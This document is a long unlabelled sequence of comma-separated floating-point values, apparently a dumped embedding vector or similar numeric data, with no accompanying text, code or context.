0.009863478131592274, -0.024129418656229973, 0.013859342783689499, 0.0006712352624163032, -0.005289263557642698, -0.004164112266153097, 0.014125734567642212, -0.039902571588754654, -0.03993061184883118, 0.015002020634710789, 0.012877902947366238, 0.011258525773882866, -0.002075045835226774, -0.02100282907485962, 0.0415850393474102, 0.00656513636931777, 0.02522302232682705, 0.030312493443489075, 0.005008852109313011, 0.006284724920988083, -0.006950702518224716, 0.009604097343981266, 0.03892112895846367, 0.0009025748004205525, -0.0012399450642988086, 0.010417290963232517, 0.03507949039340019, -0.01702098362147808, -0.000898193393368274, 0.03390176221728325, -0.0016728304326534271, -0.014707588590681553, 0.009162449277937412, -0.012064709328114986, -0.0020873139146715403, -0.004858131054788828, -0.009015233255922794, 0.006821012124419212, -0.0016360264271497726, 0.02750837802886963, 0.002064530272036791, -0.026400752365589142, -0.005706375930458307, 0.023147977888584137, 0.05215655639767647, 0.009113376960158348, 0.013410684652626514, 0.007837504148483276, -0.004507616627961397, -0.009688220918178558, 0.01477769110351801, -0.03348114341497421, 0.027886932715773582, -0.011398731730878353, 0.026568999513983727, -0.015268411487340927, -0.016824696213006973, -0.007006784901022911, 0.000921853119507432, -0.003655866254121065, -0.021535610780119896, -0.03586464375257492, -0.016263872385025024, -0.005685345269739628, 0.06757919490337372, -0.0046828738413751125, -0.021984269842505455, -0.007430907338857651, 0.04783821851015091, 0.024816425517201424, -0.020301800221204758, 0.030172288417816162, -0.0162358321249485, 0.0003047285426873714, 0.002227519638836384, 0.015170267783105373, 0.0017385518876835704, 0.0015107174403965473, 0.0014896865468472242, 0.006680806167423725, -0.008096884936094284, 0.01724531315267086, -0.010073786601424217, -0.0016526757972314954, 0.0010883475188165903, -0.03081723488867283, -0.02180200070142746, 0.0008889923919923604, 0.015703048557043076, 0.05252109095454216, 0.03914545848965645, 0.0038731852546334267, 0.03765927627682686, -0.00590967433527112, 0.020231695845723152, 0.046183791011571884, 0.0211009718477726, -0.0018419537227600813, 0.02464817836880684, -0.02626054547727108, -0.00026376216555945575, 0.03594876825809479, -0.010788836516439915, 0.020624272525310516, 0.014819752424955368, 0.006845548283308744, -0.020932726562023163, -0.010669661685824394, -0.0413326695561409, 0.0026937038637697697, -0.052689339965581894, 0.005173593759536743, -0.02933105267584324, -0.0241013765335083, 0.021283240988850594, -0.01782015711069107, -0.014945938251912594, -0.037631236016750336, -0.02591003105044365, -0.027368171140551567, -0.0037329792976379395, -0.0260362159460783, -0.0018980359891429543, -0.0004837099986616522, 0.0022923648357391357, -0.0234143678098917, 0.004896687343716621, 0.01039625983685255, 0.01427996065467596, -0.03757515549659729, -0.0010568011784926057, 0.023204060271382332, -0.0006940186722204089, -0.012569449841976166, 0.06253178417682648, -0.041949573904275894, -0.005930705461651087, 0.004178132861852646, 0.029975999146699905, 0.02191416546702385, 0.011777287349104881, 0.0030687544494867325, -0.027466315776109695, 0.012688624672591686, -0.005131532438099384, -0.003424526657909155, -0.00559771666303277, -0.023204060271382332, 0.020582210272550583, 0.025881990790367126, -0.021409425884485245, -0.0023501997347921133, -0.01860530860722065, 0.010122858919203281, -0.030004041269421577, 0.008832965046167374, 0.006768434774130583, 0.031153729185461998, -0.030424658209085464, 0.016614386811852455, -0.020161593332886696, -0.02293766848742962, 0.028503838926553726, 0.022867565974593163, -0.02376488223671913, -0.02544735185801983, -0.01577315293252468, -0.006572146899998188, 0.0046583376824855804, -0.03779948130249977, 0.025377249345183372, 0.04234215244650841, 0.0241013765335083, -0.00016999953368213028, -0.027368171140551567, 0.014055631123483181, -0.01767995022237301, 0.030789192765951157, -0.011321618221700191, -0.01737149804830551, 0.02924693003296852, -0.008797913789749146, -0.027494357898831367, 0.03025641106069088, -0.047698013484478, 0.03070507012307644, -0.05055820941925049, -0.017750054597854614, -0.026639102026820183, 0.007501010317355394, 0.020343860611319542, 0.026414772495627403, 0.008005751296877861, -0.006803486496210098, -0.013768209144473076, -0.007739359978586435, 0.007031320594251156, -0.015142226591706276, 0.02170385792851448, 0.025321166962385178, 0.018352938815951347, -0.0413326695561409, -0.0006791218183934689, 0.008314203470945358, -0.0005586324841715395, -0.0024746323470026255, 0.03092939965426922, -0.00793564785271883, -0.006785960402339697, -0.019222214818000793, -0.030088163912296295, -0.029751669615507126, 0.020764479413628578, -0.010319146327674389, 0.05299779027700424, -0.016936860978603363, 0.0036243197973817587, 0.0034823615569621325, 0.031041564419865608, 0.010312136262655258, 0.010452342219650745, 0.006165550090372562, -0.005955241154879332, 0.00291452812962234, 0.010466363281011581, -0.001530872075818479, 0.023091895505785942, -0.02638673037290573, 0.02011953294277191, -0.015436658635735512, 0.015156246721744537, 0.005222666077315807, 0.002402776852250099, 0.00567833473905921, 0.0042412253096699715, 0.013992538675665855, -0.013340582139790058, 0.023540552705526352, -0.0006423178128898144, 0.016628406941890717, 0.00567833473905921, -0.026751266792416573, -0.0106135793030262, 0.000005617131591861835, 0.016810676082968712, -0.016193769872188568, -0.009646158665418625, 0.01575913093984127, -0.0013836559373885393, -0.04876357689499855, -0.011160381138324738, 0.001184738939628005, -0.01780613698065281, -0.016698511317372322, -0.016628406941890717, -0.020750457420945168, 0.028153324499726295, 0.011854399926960468, -0.0029618474654853344, -0.026681164279580116, 0.007115444168448448, -0.011917492374777794, -0.004062463063746691, -0.03392980247735977, -0.026092298328876495, 0.010143889114260674, 0.02260117419064045, 0.012990066781640053, 0.029975999146699905, 0.016179749742150307, 0.0207925196737051, 0.002662157639861107, -0.014847793616354465, -0.007458948530256748, 0.024143438786268234, 0.03479908034205437, -0.018759535625576973, -0.02271333895623684, 0.03855659440159798, -0.022348804399371147, -0.018563248217105865, -0.023722821846604347, 0.02525106444954872, 0.011545947752892971, -0.009029253385961056, 0.0335933081805706, 0.015618925914168358, 0.0038942161481827497, -0.0048406049609184265, 0.019110050052404404, 0.019039947539567947, -0.01804448664188385, 0.02133932337164879, 0.013599961996078491, -0.038079895079135895, 0.007479979190975428, -0.00014644933980889618, -0.00977234449237585, -0.014076662249863148, -0.003953803330659866, 0.0014809237327426672, -0.004802048671990633, 0.005106996279209852, -0.04222998768091202, 0.020848602056503296, -0.017497682943940163, -0.032920319586992264, -0.014861814677715302, 0.02501271478831768, 0.010557496920228004, -0.0022643236443400383, -0.003144114976748824, -0.005794004537165165, -0.007585133891552687, 0.014006558805704117, -0.025040755048394203, 0.010522444732487202, -0.018633350729942322, -0.007115444168448448, -0.009653168730437756, 0.03939782828092575, 0.009905539453029633, 0.018114589154720306, -0.030004041269421577, -0.015955420210957527, 0.02776074782013893, 0.01266759354621172, 0.020287778228521347, -0.026863431558012962, 0.009800385683774948, 0.0040694731287658215, -0.01734345778822899, 0.03014424629509449, -0.03687412664294243, -0.01951664686203003, 0.008692759089171886, 0.023260142654180527, -0.008531522937119007, -0.004644317086786032, 0.0003947669465560466, 0.0018980359891429543, 0.016530264168977737, 0.0033666917588561773, 0.027704665437340736, 0.005741427652537823, -0.020512107759714127, 0.02031582035124302, -0.02376488223671913, -0.00708039291203022, -0.0011067495215684175, 0.02146550826728344, -0.019096029922366142, -0.001509841182269156, 0.0006948949885554612, -0.000874533667229116, -0.00756410276517272, -0.003286073449999094, -0.015801193192601204, -0.003261537291109562, -0.010999144986271858, 0.009877498261630535, -0.00442699808627367, -0.03709845244884491, 0.01828283630311489, -0.0105504859238863, 0.008377296850085258, 0.014805732294917107, 0.01182635873556137, -0.007746370509266853, -0.00567833473905921, -0.047081105411052704, -0.002514941617846489, -0.02296571061015129, -0.021507568657398224, 0.004837099928408861, -0.043688125908374786, 0.012120790779590607, -0.004058958031237125, 0.005404933355748653, 0.014847793616354465, 0.0076342057436704636, -0.015086144208908081, -0.00553812924772501, 0.0009165953961201012, 0.006039364729076624, -0.012352130375802517, 0.005177099257707596, 0.019684894010424614, -0.01737149804830551, 0.015268411487340927, 0.004623285960406065, 0.003410506062209606, 0.016305934637784958, -0.004220194648951292, -0.011721204966306686, -0.0280972421169281, -0.044024620205163956, 0.029050640761852264, -0.005685345269739628, 0.01347377710044384, -0.006463487166911364, 0.020736437290906906, 0.007557092700153589, 0.01782015711069107, -0.016740571707487106, 0.003578752977773547, 0.010690691880881786, -0.012429243884980679, -0.00665627047419548, 0.021633755415678024, 0.0018472113879397511, -0.002248550532385707, 0.044809773564338684, 0.0012776253279298544, -0.004788028076291084, -0.00436741067096591, -0.030088163912296295, 0.015114185400307178, -0.025980133563280106, -0.018675412982702255, 0.028363632038235664, -0.008706780150532722, 0.049829140305519104, 0.049043986946344376, -0.0031160737853497267, -0.01839500106871128, -0.03586464375257492, 0.008531522937119007, 0.012464295141398907, 0.017399540171027184, -0.021381383761763573, -0.007858535274863243, -0.014265939593315125, -0.031910840421915054, 0.05302583426237106, -0.012317079119384289, -0.004612770862877369, 0.0034087535459548235, 0.012148831970989704, 0.0465763658285141, -0.012471306137740612, 0.01204367820173502, 0.018563248217105865, -0.00425524590536952, -0.006870083976536989, -0.011335638351738453, -0.03777144104242325, 0.023358285427093506, 0.0040694731287658215, 0.015506761148571968, -0.020736437290906906, 0.021759940311312675, 0.028363632038235664, -0.0006204106612131, -0.04077184572815895, -0.03255578503012657, 0.044809773564338684, 0.0012215430615469813, 0.00596926175057888, -0.024073336273431778, -0.013270478695631027, 0.015843255445361137, 0.023905089125037193, -0.02044200524687767, -0.017834177240729332, 0.01838098093867302, 0.01296903658658266, 0.0033964854665100574, -0.027157863602042198, 0.0241013765335083, 0.0026674154214560986, -0.013186355121433735, -0.005071944557130337, 0.037967730313539505, 0.03036857582628727, -0.01135666947811842, -0.020932726562023163, 0.012127801775932312, 0.00815997738391161, 0.008188018575310707, -0.010865949094295502, -0.003380712354555726, 0.01119543332606554, -0.008033792488276958, 0.0035629798658192158, -0.01918015256524086, 0.019096029922366142, -0.0007899720221757889, 0.014805732294917107, 0.017834177240729332, -0.008265132084488869, 0.007879565469920635, -0.008671728894114494, -0.00169911899138242, -0.0066107031889259815, 0.004335864447057247, -0.05787695199251175, 0.02331622503697872, 0.03950999304652214, 0.03364939242601395, 0.020413964986801147, 0.0016211295733228326, -0.002937311539426446, 0.021731898188591003, -0.006119983270764351, 0.0071925572119653225, -0.01085192896425724, -0.011910482309758663, 0.020357882604002953, -0.012148831970989704, -0.010473373346030712, 0.003506897483021021, 0.012597491033375263, -0.01142677292227745, -0.026400752365589142, -0.025601578876376152, -0.007508020382374525, -0.00811791606247425, -0.01243625394999981, -0.032247334718704224, -0.020175613462924957, -0.009982652962207794, 0.03207908570766449, 0.025966113433241844, 0.010452342219650745, -0.02260117419064045, 0.04452935978770256, 0.01713314838707447, 0.017497682943940163, -0.0029600949492305517, -0.035331860184669495, 0.0071995677426457405, -0.010992134921252728, 0.017497682943940163, -0.0037154536694288254, -0.01884366013109684, -0.02168983779847622, 0.007571113295853138, -0.024690240621566772, 0.012842850759625435, -0.026456834748387337, 0.012997077777981758, -0.01524037029594183, -0.03920154273509979, -0.006743899080902338, 0.020301800221204758, -0.00767626753076911, -0.004370915703475475, -0.0174836628139019, -0.01239419262856245, -0.017974384129047394, 0.016277892515063286, 0.013193365186452866, 0.002408034633845091, -0.0018069022335112095, -0.01906798779964447, -0.00781647302210331, 0.009120387025177479, -0.012709655798971653, 0.0037785463500767946, -0.01420985721051693, -0.019586749374866486, -0.0030564863700419664, -0.011181412264704704, 0.016544284299016, -0.050305839627981186, -0.0449499785900116, 0.008419358171522617, 0.00145726406481117, -0.023554574698209763, 0.0044935960322618484, -0.026793327182531357, -0.007472969125956297, -0.01039625983685255, -0.02557353675365448, 0.023428387939929962, 0.02157767303287983, 0.021759940311312675, -0.006631734315305948, 0.027816830202937126, -0.010522444732487202, 0.024970652535557747, 0.00018664896197151393, 0.027564460411667824, -0.011482855305075645, -0.003557722084224224, -0.037406906485557556, 0.0060358596965670586, -0.017764074727892876, -0.05871818959712982, 0.010038735345005989, -0.0069612180814146996, 0.02455003559589386, -0.028349611908197403, 0.01633397489786148, -0.019586749374866486, 0.01427996065467596, 0.01382429152727127, -0.01965685375034809, -0.007185547146946192, 0.010473373346030712, 0.00782348308712244, -0.007872555404901505, 0.006768434774130583, -0.02250303141772747, 0.007458948530256748, 0.017960362136363983, -0.003052981337532401, -0.001282006734982133, -0.04312730208039284, -0.0009823169093579054, -0.02854590117931366, -0.017623869702219963, -0.006123488303273916, 0.016698511317372322, 0.01147584430873394, -0.0194185022264719, -0.003690917743369937, 0.00716101098805666, -0.0012259244685992599, 0.01814262941479683, -0.03656567260622978, -0.02125519886612892, -0.06354127079248428, -0.014707588590681553, -0.01780613698065281, -0.019460564479231834, -0.0017613352974876761, 0.025853948667645454, -0.01609562523663044, 0.02159169316291809, -0.02398921176791191, 0.0037329792976379395, 0.018226753920316696, 0.005380397662520409, -0.011279556900262833, -0.016936860978603363, -0.005468026269227266, 0.012948005460202694, -0.008293173275887966, 0.008924098685383797, -0.027129821479320526, 0.008328224532306194, -0.020231695845723152, 0.0027462809812277555, -0.009330695495009422, 0.0397062823176384, -0.002257313346490264, 0.015212329104542732, -0.01215584296733141, -0.013172334991395473, -0.005569675471633673, 0.0021381385158747435, 0.04222998768091202, 0.004374420735985041, 0.040687721222639084, -0.027550438418984413, -0.010059766471385956, 0.0002758110931608826, 0.02935909479856491, 0.06326085329055786, -0.01073275413364172, -0.01850716583430767, 0.050866663455963135, 0.015717070549726486, 0.005702870897948742, -0.05310995504260063, 0.010564506985247135, 0.008075853809714317, -0.0033351455349475145, -0.00947090145200491, -0.032387539744377136, -0.044024620205163956, -0.012415223754942417, 0.03541598469018936, 0.018689433112740517, 0.00982141587883234, 0.054175522178411484, 0.012709655798971653, 0.011616050265729427, -0.014497279189527035, -0.005117511842399836, -0.002064530272036791, -0.0012259244685992599, 0.0014493773924186826, 0.008573584258556366, -0.008405338041484356, -0.022979730740189552, 0.015450678765773773, 0.007515030913054943, 0.025209002196788788, -0.005443490110337734, 0.007865545339882374, -0.007479979190975428, 0.02239086665213108, -0.015801193192601204, -0.05838169530034065, 0.005138542503118515, 0.00862265657633543, -0.026737244799733162, 0.010024714283645153, 0.0102700749412179, 0.02902260050177574, 0.020357882604002953, -0.0012478316202759743, 0.010192961432039738, 0.011651101522147655, 0.01112532988190651, -0.0034175163600593805, -0.007956678979098797, -0.04323946684598923, -0.03552814945578575, 0.02819538675248623, 0.010536465793848038, 0.007977710105478764, -0.007213588338345289, -0.00553812924772501, 0.006330291740596294, -0.012260996736586094, 0.011616050265729427, -0.01988118141889572, 0.008433378301560879, -0.0036628765519708395, 0.017651909962296486, -0.021409425884485245, 0.04422090947628021, -0.038079895079135895, -0.04399657994508743, -0.0212271586060524, -0.016516242176294327, -0.01085192896425724, 0.012997077777981758, -0.013277488760650158, 0.006098952144384384, -0.0062812198884785175, -0.014679547399282455, -0.04461348429322243, 0.00044318175059743226, -0.01633397489786148, -0.017427580431103706, 0.009351726621389389, -0.015843255445361137, 0.0036593712866306305, -0.005983282346278429, -0.005569675471633673, -0.03219125047326088, -0.018198711797595024, 0.008910078555345535, -0.007241629529744387, 0.005390912760049105, 0.006880599539726973, -0.03199496492743492, -0.02293766848742962, -0.01805850677192211, -0.010115847922861576, -0.011973574757575989, 0.0056923553347587585, -0.015787173062562943, 0.015717070549726486, -0.014931917190551758, -0.0020189634524285793, -0.00031831098021939397, -0.003915247041732073, -0.01159501913934946, -0.026667142286896706, -0.020946746692061424, -0.004518131725490093, -0.021409425884485245, -0.025601578876376152, 0.00028720282716676593, 0.049941305071115494, -0.028700126335024834, -0.02066633477807045, 0.009036263450980186, 0.016712531447410583, -0.00008456162322545424, 0.00665627047419548, 0.016179749742150307, 0.003412258578464389, 0.03639742359519005, 0.009597087278962135, -0.0020995817612856627, 0.016137687489390373, 0.010592548176646233, 0.016165727749466896, 0.010676671750843525, 0.00935873668640852, -0.013775219209492207, 0.023133955895900726, -0.011272545903921127, -0.020413964986801147, 0.0008644563495181501, -0.017077066004276276, -0.021773960441350937, 0.008244100958108902, 0.0005998179549351335, -0.01101316511631012, -0.030564863234758377, -0.009344716556370258, -0.004833594895899296, -0.03449062630534172, -0.012211925350129604, -0.026975596323609352, -0.0061094677075743675, 0.004209679085761309, -0.0034297844395041466, 0.008075853809714317, -0.008265132084488869, -0.01273769699037075, -0.03505145013332367, 0.0037715360522270203, -0.01227501779794693, 0.006891115102916956, 0.013116252608597279, -0.0033859701361507177, -0.032471664249897, 0.005587201099842787, 0.02090468443930149, -0.01805850677192211, 0.01005275547504425, 0.014609443955123425, -0.02365271747112274, 0.03931370750069618, 0.003329887753352523, 0.028854353353381157, 0.03903329372406006, 0.025839928537607193, -0.0018489639041945338, -0.0019103039521723986, 0.0024308180436491966, -0.006316271144896746, 0.0002414168557152152, 0.0069296713918447495, 0.017623869702219963, -0.0073537942953407764, 0.0010629352182149887, -0.0349673256278038, 0.004311328288167715, -0.03810793533921242, 0.016418099403381348, 0.013319551013410091, -0.007725339382886887, -0.023372307419776917, -0.000515694438945502, 0.033845677971839905, 0.026442812755703926, -0.014455217868089676, 0.021395403891801834, -0.00947090145200491, -0.013088211417198181, 0.003010919550433755, 0.0231619980186224, -0.033733513206243515, 0.025166939944028854, -0.012863881886005402, 0.014371094293892384, -0.008643687702715397, -0.010185951367020607, -0.012197904288768768, -0.00556616997346282, -0.000018347243894822896, 0.02693353407084942, 0.023372307419776917, 0.010564506985247135, -0.013964497484266758, 0.01084491889923811, -0.02455003559589386, 0.0008276523440144956, -0.02215251699090004, -0.0021469013299793005, 0.011959554627537727, 0.008980181068181992, 0.015927378088235855, -0.013606972992420197, 0.02237684465944767, 0.011973574757575989, 0.03278011456131935, 0.014181816019117832, 0.012485326267778873, -0.0011295329313725233, -0.0027900952845811844, 0.013894394971430302, 0.005573180504143238, -0.010185951367020607, -0.02077849954366684, -0.0020347365643829107, 0.01038924977183342, 0.0241013765335083, -0.0028707138262689114, -0.01803046651184559, -0.010382239706814289, -0.013656044378876686, 0.02205437235534191, 0.0004582976980600506, 0.005096480716019869, 0.015717070549726486, 0.003666381584480405, 0.007592143956571817, 0.03802381083369255, -0.008440389297902584, 0.025180961936712265, -0.00041360710747539997, 0.02089066430926323, 0.0015501503366976976, -0.006586167495697737, -0.011665122583508492, 0.018479123711586, 0.019376441836357117, -0.04256648197770119, -0.016039542853832245, -0.02090468443930149, 0.020133553072810173, 0.0037224639672785997, -0.017876239493489265, 0.017189230769872665, -0.019923243671655655, -0.004998336546123028, 0.01622181013226509, 0.031013522297143936, 0.016950881108641624, -0.015408617444336414, -0.013109242543578148, -0.000277782732155174, 0.010957082733511925, -0.016053562983870506, -0.00026880079531110823, 0.04208977892994881, -0.021886125206947327, -0.038304224610328674, 0.010221002623438835, 0.009604097343981266, 0.012940995395183563, 0.015324493870139122, -0.02798507735133171, 0.025713743641972542, 0.036958247423172, 0.00257102376781404, -0.02602219581604004, -0.0207925196737051, -0.03404196724295616, 0.007136475294828415, 0.017651909962296486, 0.0007544824620708823, 0.0443330742418766, 0.013235427439212799, 0.034322381019592285, -0.0028619507793337107, -0.014637485146522522, 0.03917349874973297, -0.012127801775932312, -0.006733383517712355, -0.011833369731903076, -0.005454005673527718, 0.017722012475132942, 0.01535253506153822, -0.0188576802611351, -0.03182671591639519, 0.008825954981148243, -0.031097646802663803, 0.01273769699037075, -0.007907606661319733, 0.008237090893089771, -0.0001474351593060419, 0.03541598469018936, 0.015829235315322876, 0.024339726194739342, 0.00215741666033864, -0.005411943886429071, 0.0021942206658422947, 0.011959554627537727, -0.0010541722876951098, -0.005934210494160652, -0.0027603015769273043, 0.015072123147547245, -0.01930633746087551, -0.010557496920228004, -0.011223474517464638, -0.02068035490810871, 0.0001139172090915963, 0.009716262109577656, -0.005794004537165165, 0.019684894010424614, -0.007017299998551607, 0.0020312315318733454, 0.0003084527561441064, 0.02204035222530365, -0.007003279402852058, -0.010361208580434322, -0.01113233994692564, -0.007802452892065048, -0.005457510706037283, 0.05010955035686493, -0.014174805954098701, -0.029779711738228798, 0.0006843795417807996, 0.021143034100532532, 0.021297261118888855, -0.03300444409251213, -0.012008626945316792, 0.0019523657392710447, -0.025531476363539696, -0.023596635088324547, -0.023582614958286285, -0.013599961996078491, -0.008769872598350048, -0.013564910739660263, 0.00731173250824213, -0.025405291467905045, -0.012303058989346027, 0.008917088620364666, -0.002670920453965664, -0.0022327774204313755, -0.014350063167512417, 0.0068560633808374405, 0.0032790631521493196, -0.00024163593479897827, -0.0018279331270605326, 0.012485326267778873, -0.0026306111831218004, 0.01769397221505642, -0.0009989662794396281, 0.0006221632356755435, 0.025713743641972542, 0.030508780851960182, -0.01655830442905426, 0.026919513940811157, -0.02296571061015129, -0.002437828341498971, -0.0018454588716849685, 0.0007851524860598147, 0.006151529494673014, -0.022096434608101845, -0.005482046864926815, 0.008251111023128033, -0.020035408437252045, 0.032135169953107834, -0.005114006344228983, -0.009730282239615917, 0.012380171567201614, 0.0035296808928251266, 0.000818451342638582, 0.01090100035071373, 0.00003716001447173767, 0.008012761361896992, -0.014132744632661343, -0.015198308043181896, 0.02776074782013893, -0.000341313483659178, -0.009877498261630535, -0.0009297396754845977, -0.01874551549553871, 0.017651909962296486, 0.003673391882330179, -0.03564031422138214, -0.013733157888054848, -0.020273758098483086, -0.017203250899910927, 0.0002931177441496402, -0.006158539559692144, 0.004318338353186846, 0.017427580431103706, -0.008748841471970081, -0.019811078906059265, -0.007339773699641228, -0.006302250549197197, 0.03779948130249977, -0.02135334350168705, 0.013389653526246548, 0.021605713292956352, -0.02627456746995449, 0.005587201099842787, 0.021269218996167183, -0.002450096420943737, -0.0006830650963820517, -0.02546137198805809, -0.005106996279209852, 0.017147168517112732, -0.041837409138679504, -0.0005581943551078439, 0.00309679564088583, 0.013389653526246548, -0.0030301976948976517, 0.011686153709888458, -0.008068843744695187, -0.0010708217741921544, 0.0021766950376331806, 0.008517501875758171, 0.01393645629286766, 0.001899788505397737, -0.0058570969849824905, 0.014427176676690578, -0.001595717272721231, 0.012716665863990784, -0.015212329104542732, 0.01028409507125616, 0.01563294604420662, -0.003876690287142992, -0.01596944034099579, -0.0026200958527624607, -0.004693388938903809, 0.00690864073112607, 0.007753380574285984, 0.01874551549553871, 0.007041836157441139, 0.016067584976553917, -0.012744707055389881, 0.01999334618449211, -0.017750054597854614, -0.03437846153974533, -0.01826881617307663, -0.042173903435468674, 0.017722012475132942, -0.008293173275887966, -0.030873317271471024, 0.006568641867488623, -0.017553765326738358, 0.0023764881771057844, 0.01566098816692829, 0.00602183910086751, -0.03527577966451645, -0.0028023633640259504, -0.0049387491308152676, 0.0022713339421898127, 0.011524916626513004, 0.024970652535557747, -0.009337706491351128, 0.014889855869114399, 0.0022713339421898127, 0.0033824648708105087, -0.013060170225799084, -0.012317079119384289, 0.003739989595487714, -0.007154000923037529, -0.006491528358310461, 0.028714148327708244, 0.0006370600895024836, 0.0015089649241417646, 0.015142226591706276, -0.0008412348106503487, 0.00045260184560902417, -0.015955420210957527, -0.002150406362488866, -0.006491528358310461, 0.009442860260605812, -0.003834628500044346, 0.002868961077183485, 0.017049025744199753, -0.0198531411588192, -0.011118319816887379, 0.02261519432067871, 0.0035349386744201183, 0.001994427526369691, 0.01404161099344492, -0.000995461130514741, -0.013221406377851963, 0.034546706825494766, -0.02055417001247406, -0.0007746370392851532, -0.017623869702219963, -0.0035349386744201183, 0.0020294790156185627, 0.03600484877824783, 0.021171076223254204, 0.017301395535469055, -0.0023712306283414364, 0.0011926256120204926, -0.0037575154565274715, -0.011188422329723835, -0.025209002196788788, -0.01746964268386364, 0.0037154536694288254, 0.0008351007709279656, -0.005653798580169678, 0.011034196242690086, 0.005741427652537823, -0.00015729338338132948, -0.0035472067538648844, -0.018128609284758568, 0.002416797447949648, -0.004202669020742178, 0.015604905784130096, 0.004104524850845337, 0.004185142926871777, -0.006628229282796383, -0.00907832570374012, -0.01700696349143982, 0.0017779847839847207, -0.010080796666443348, -0.014181816019117832, -0.01028409507125616, 0.007725339382886887, 0.013726147823035717, -0.017946342006325722, -0.004346379544585943, 0.004942254163324833, -0.015030061826109886, -0.003084527561441064, -0.03777144104242325, -0.02902260050177574, 0.012457285076379776, 0.011265535838901997, 0.012990066781640053, 0.009505952708423138, -0.016053562983870506, -0.0006410033674910665, 0.007339773699641228, 0.0007702555740252137, -0.0022205093409866095, -0.012835840694606304, -0.002152159111574292, 0.020007368177175522, -0.010354198515415192, -0.008173998445272446, 0.0029495793860405684, -0.02181602269411087, -0.012078729458153248, -0.02899455837905407, -0.01097110379487276, 0.010992134921252728, -0.017189230769872665, 0.0069542075507342815, 0.009786364622414112, 0.015731090679764748, 0.023554574698209763, -0.006814001593738794, 0.007423896808177233, -0.012204914353787899, 0.015787173062562943, 0.005786994472146034, -0.003880195552483201, -0.01996530592441559, -0.02282550372183323, 0.03507949039340019, 0.018899740651249886, 0.030172288417816162, 0.022068392485380173, 0.011146361008286476, -0.006049880292266607, 0.032948363572359085, -0.01825479418039322, 0.01620779000222683, -0.016488201916217804, 0.002064530272036791, -0.021773960441350937, 0.007090908009558916, -0.0009016985422931612, -0.018409021198749542, -0.007458948530256748, -0.007045341189950705, -0.022446949034929276, 0.011517906561493874, 0.015913357958197594, -0.010031725279986858, -0.0030459710396826267, -0.012891923077404499, 0.012646563351154327, 0.023778904229402542, -0.0008390440489165485, 0.003666381584480405, 0.0012653573649004102, 0.00048502444406040013, 0.003531433641910553, -0.0046828738413751125, 0.026456834748387337, 0.015226349234580994, 0.012492336332798004, 0.01953066699206829, 0.0026761782355606556, -0.019362419843673706, -0.014595423825085163, -0.013067180290818214, -0.008138946257531643, 0.005569675471633673, 0.013747178949415684, 0.027003636583685875, 0.01588531769812107, -0.00970925111323595, 0.010922031477093697, 0.001494944328442216, -0.015450678765773773, -0.01609562523663044, -0.01758180744946003, -0.016418099403381348, 0.008538533002138138, -0.006579156965017319, 0.003421021392568946, 0.003350918646901846, -0.03505145013332367, 0.008748841471970081, -0.006456477101892233, 0.014202847145497799, 0.0161096453666687, -0.0062566837295889854, -0.008124926127493382, -0.019446544349193573, -0.0008648945367895067, 0.021044889464974403, -0.021325301378965378, 0.0023589625488966703, -0.01416779588907957, -0.015422637574374676, 0.004623285960406065, -0.0005971890641376376, 0.013494808226823807, -0.006649259943515062, -0.011903472244739532, 0.005180604290217161, 0.0041010198183357716, -0.002977620577439666, -0.026204463094472885, 0.0038731852546334267, -0.025377249345183372, -0.0024395808577537537, 0.005362871568650007, 0.0058641075156629086, -0.011833369731903076, -0.007760391104966402, 0.01084491889923811, -0.013620993122458458, -0.01170718390494585, 0.004065968096256256, -0.0033228774555027485, 0.01015791017562151, -0.02170385792851448, 0.01136367954313755, 0.011440793052315712, -0.02582590840756893, 0.003743494860827923, -0.0034998871851712465, -0.011903472244739532, -0.009365747682750225, -0.008980181068181992, 0.02456405572593212, 0.0013153055915609002, -0.005702870897948742, -0.0036768971476703882, 0.0026674154214560986, -0.01974097639322281, 0.0033193721901625395, -0.007038331124931574, -0.014286970719695091, -0.008678738959133625, 0.004630296491086483, -0.014329032972455025, -0.00907832570374012, -0.023834984749555588, 0.011041206307709217, -0.004696894437074661, 0.009379767812788486, -0.005818540696054697, 0.008980181068181992, -0.0201055109500885, 0.011034196242690086, 0.02558755874633789, 0.00010630447650328279, -0.0033842173870652914, -0.0053558615036308765, 0.01113233994692564, -0.005464520771056414, -0.003233496332541108, 0.014020579867064953, 0.03118176944553852, -0.026653122156858444, 0.003070506965741515, -0.005762458313256502, -0.005380397662520409, -0.024353746324777603, 0.011167392134666443, -0.0074449279345571995, 0.02638673037290573, -0.010564506985247135, -0.0069296713918447495, 0.00009535089338896796, -0.021731898188591003, 0.0018542216857895255, 0.01062759943306446, 0.01535253506153822, 0.011069247499108315, -0.005131532438099384, 0.013508828356862068, 0.005334830842912197, 0.0034087535459548235, -0.010690691880881786, -0.01455336157232523, -0.011805328540503979, -0.0016570573206990957, 0.018016444519162178, 0.0033544236794114113, 0.018212733790278435, -0.0024395808577537537, 0.010718733072280884, -0.006119983270764351, 0.009744303300976753, 0.0030775172635912895, -0.009400798939168453, 0.021199116483330727, 0.022432927042245865, -0.002562260953709483, 0.001817417680285871, -0.0009823169093579054, 0.015927378088235855, -0.0038486490957438946, -0.02865806594491005, 0.029303012415766716, -0.007367814891040325, 0.02363869734108448, -0.010410280898213387, 0.01737149804830551, -0.011531926691532135, -0.007269670721143484, -0.014237898401916027, 0.019726956263184547, -0.018759535625576973, 0.0020470046438276768, 0.008552554063498974, 0.017287375405430794, -0.016165727749466896, 0.016614386811852455, 0.003165145870298147, 0.007374824956059456, 0.009057294577360153, 0.017974384129047394, -0.015927378088235855, 0.012022647075355053, 0.012541408650577068, 0.00009387216414324939, 0.007522040978074074, -0.01255542878061533, -0.007213588338345289, 0.0039222571067512035, 0.015506761148571968, -0.016866756603121758, -0.0035209180787205696, -0.00009672009036876261, -0.008580595254898071, 0.010529455728828907, -0.01767995022237301, 0.006810496561229229, 0.015100164338946342, 0.002055767457932234, -0.021269218996167183, 0.025531476363539696, 0.00003702309186337516, -0.017203250899910927, -0.02045602537691593, -0.006540600676089525, 0.001524738036096096, -0.012211925350129604, 0.013642024248838425, -0.016291914507746696, -0.004490090534090996, 0.007585133891552687, -0.010010694153606892, -0.029387135058641434, 0.0015238617779687047, 0.011181412264704704, -0.0035033924505114555, -0.03378959745168686, 0.0044935960322618484, -0.013859342783689499, 0.012583469972014427, 0.005941220559179783, 0.0044865855015814304, -0.01563294604420662, -0.002408034633845091, -0.05072645843029022, -0.00993358064442873, -0.01107625849545002, -0.0038451440632343292, 0.005096480716019869, -0.008482450619339943, -0.00045128740021027625, 0.007175031583756208, -0.0032632900401949883, -0.003548959270119667, -0.021311281248927116, 0.004998336546123028, 